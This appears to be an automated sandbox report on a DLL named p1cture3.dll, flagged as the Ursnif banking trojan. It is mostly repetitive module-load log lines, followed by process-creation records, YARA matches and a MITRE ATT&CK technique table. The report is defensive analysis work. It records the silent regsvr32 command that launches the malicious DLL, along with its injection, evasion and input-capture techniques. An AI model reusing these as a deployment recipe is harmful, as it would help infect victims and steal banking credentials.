            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: classification engineClassification label: mal68.bank.troj.winDLL@14/118@9/1
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF56A2 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_00DF56A2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF454B5307E16E503B.TMPJump to behavior
            Source: p1cture3.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: p1cture3.dllVirustotal: Detection: 20%
            Source: p1cture3.dllReversingLabs: Detection: 18%
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\p1cture3.dll'
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\p1cture3.dll
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6112 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6112 CREDAT:17418 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6112 CREDAT:17432 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\p1cture3.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6112 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6112 CREDAT:17418 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6112 CREDAT:17432 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\p1cture3.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00A82170 push ecx; ret 1_2_00A82179
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00A821C3 push ecx; ret 1_2_00A821D3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DFB0CB push ecx; ret 1_2_00DFB0DB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DFAD10 push ecx; ret 1_2_00DFAD19

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.246155048.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246163014.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246138579.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246106262.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246073965.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246124544.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246050953.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246026910.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5560, type: MEMORY
            Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6196Thread sleep count: 264 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6196Thread sleep time: -132000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_00DF32BA
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: regsvr32.exe, 00000001.00000002.614584526.0000000003290000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: regsvr32.exe, 00000001.00000002.614584526.0000000003290000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000001.00000002.614584526.0000000003290000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000001.00000002.614584526.0000000003290000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF93D5 cpuid 1_2_00DF93D5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00A810FC GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,1_2_00A810FC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF93D5 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,1_2_00DF93D5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00A8179C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_00A8179C

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.246155048.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246163014.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246138579.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246106262.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246073965.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246124544.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246050953.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246026910.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5560, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.246155048.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246163014.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246138579.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246106262.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246073965.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246124544.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246050953.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.246026910.0000000004C08000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5560, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2DLL Side-Loading1Process Injection12Masquerading1Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion1LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
